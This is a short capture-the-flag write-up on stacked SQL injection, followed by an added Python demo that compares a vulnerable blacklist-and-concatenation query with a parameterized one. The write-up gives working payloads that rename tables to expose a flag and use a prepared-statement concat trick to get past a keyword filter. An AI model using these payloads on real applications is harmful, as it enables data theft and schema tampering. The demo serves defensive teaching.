Stacked injection
    ![H7P2B%G6[NG8PW0B$CG$UK.png](https://cdn.nlark.com/yuque/0/2021/png/528570/1619348456807-f567e230-a0be-4508-9f8f-1d9d83db70bf.png#height=426&id=P3f1c&margin=%5Bobject%20Object%5D&name=H7P2B%25G6%5BNG8PW0B%24CG%24UK.png&originHeight=426&originWidth=498&originalType=binary&ratio=1&size=11624&status=done&style=none&width=498)
    1';show columns from `1919810931114514`;#
    Because the query reads from the words table by default, we rename the words table out of the way and rename the table we need to words.

    1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;#

    Then query 1' or 1=1#
    to get the flag.


    Alternatively, use a prepared statement to bypass the filter:

    1';set @a=concat("sel","ect flag from `1919810931114514`");prepare stmt from @a;execute stmt;#
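
Why the payloads above get through, and what stops them, as an added example that is not part of the original note. It uses Python's sqlite3 as a stand-in for the MySQL target (executescript plays the role of a multi-statement query API); the blacklist, table names and sample flag are constructed assumptions.

```python
import re
import sqlite3

# Assumed keyword blacklist, standing in for the filter the note bypasses.
BLACKLIST = re.compile(r"select|update|delete|drop|insert|where", re.I)

def make_db():
    """Constructed sample schema: a public table and a table holding the flag."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE words(id TEXT, data TEXT);"
        "INSERT INTO words VALUES('1', 'hello');"
        "CREATE TABLE secret(flag TEXT);"
        "INSERT INTO secret VALUES('flag{constructed}');"
    )
    return db

def tables(db):
    rows = db.execute("SELECT name FROM sqlite_master WHERE type='table'")
    return sorted(r[0] for r in rows)

def lookup_vulnerable(db, user_id):
    """Blacklist + string concatenation + multi-statement execution."""
    if BLACKLIST.search(user_id):
        raise ValueError("blocked by keyword filter")
    # Everything after the first ';' in user_id runs as its own statement.
    db.executescript("SELECT id, data FROM words WHERE id = '" + user_id + "';")

def lookup_hardened(db, user_id):
    """Single statement with a bound parameter: the input is only ever data."""
    return db.execute(
        "SELECT id, data FROM words WHERE id = ?", (user_id,)
    ).fetchall()

# Constructed input in the style of the note's RENAME payload (SQLite syntax).
PAYLOAD = "1'; ALTER TABLE words RENAME TO words1; --"

if __name__ == "__main__":
    db = make_db()
    lookup_vulnerable(db, PAYLOAD)          # passes the filter, schema changes
    print("vulnerable:", tables(db))
    db = make_db()
    print("hardened rows:", lookup_hardened(db, PAYLOAD))
    print("hardened:", tables(db))          # schema untouched
```

The blacklist never sees a blocked keyword, so the only reliable controls are a bound parameter and a database API or account that does not permit stacked statements or DDL from the web application.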